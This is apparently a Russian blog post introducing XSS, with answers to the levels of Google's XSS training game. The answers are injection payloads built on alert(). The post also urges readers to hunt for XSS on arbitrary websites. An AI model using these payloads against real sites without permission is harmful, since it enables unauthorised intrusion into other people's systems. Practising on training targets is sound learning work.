Довольно много людей мечтают быть хакерами и взламывать банки.
Когда чуть больше узнаешь про технологии и про то, как устроена разработка и тестирование приложений - понимаешь, что уровень людей, которые способны взломать банк, на много выше среднего - требуется несколько лет усердной подготовки в нужном направлении и с правильными учителями/книгами.
Однако есть и очень простые методы поиска уязвимостей и взлома систем, можно потренироваться и даже очень неплохо научиться использовать некоторые уязвимости.
Одним из таких видов уязвимостей можно назвать XSS. Если у вас есть браузер и доступ в интернет - вы можете попробовать поискать уязвимости на разных сайтах и обязательно их найдете (и это классно, ведь этонаша мечта здорово когда есть на чем практиковаться).
Я хотел написать статью про XSS инъекции, но так уж вышло что один талантливый человек сделал это раньше, и его статья мне очень понравилась, поэтому просто оставлю это здесь:
А еще одни ребята сделали игру для поиска XSS инъекций, советую вам в нее поиграть и попробовать пройти все шаги:
Для тех, кому игра покажется слишкомхардкорной сложной, я оставляю подсказки (ответы) для всех этапов прохождения:
Когда чуть больше узнаешь про технологии и про то, как устроена разработка и тестирование приложений - понимаешь, что уровень людей, которые способны взломать банк, на много выше среднего - требуется несколько лет усердной подготовки в нужном направлении и с правильными учителями/книгами.
Однако есть и очень простые методы поиска уязвимостей и взлома систем, можно потренироваться и даже очень неплохо научиться использовать некоторые уязвимости.
Одним из таких видов уязвимостей можно назвать XSS. Если у вас есть браузер и доступ в интернет - вы можете попробовать поискать уязвимости на разных сайтах и обязательно их найдете (и это классно, ведь это
Я хотел написать статью про XSS инъекции, но так уж вышло что один талантливый человек сделал это раньше, и его статья мне очень понравилась, поэтому просто оставлю это здесь:
Для тех, кому игра покажется слишком
- Вставляем двойную кавычку и после нее пишем свой код:
"<script>alert("a");</script>
- Вставляем HTML код кнопки и нажимаем на нее:
<button onclick="alert()">
- После номера картинки добавляем одинарную кавычку, закрывающую кавычку и пишем свой код:
https://xss-game.appspot.com/level3/frame#3'><script>alert()</script>
- Есть реакция на одинарную кавычку + надо смотреть консоль браузера и исправлять ошибки - и закрываем с помощью ASCII символа двойной кавычки:
https://xss-game.appspot.com/level4/frame?timer=20%27)/alert(%27"aa
- Тут надо знать, что ссылка может содержать не только адрес, но и Java Script:
- После # надо добавить //www.google.com/jsapi?callback=alert
Комментариев нет:
Отправить комментарий
Я признателен Вам за то, что делитесь своим мнением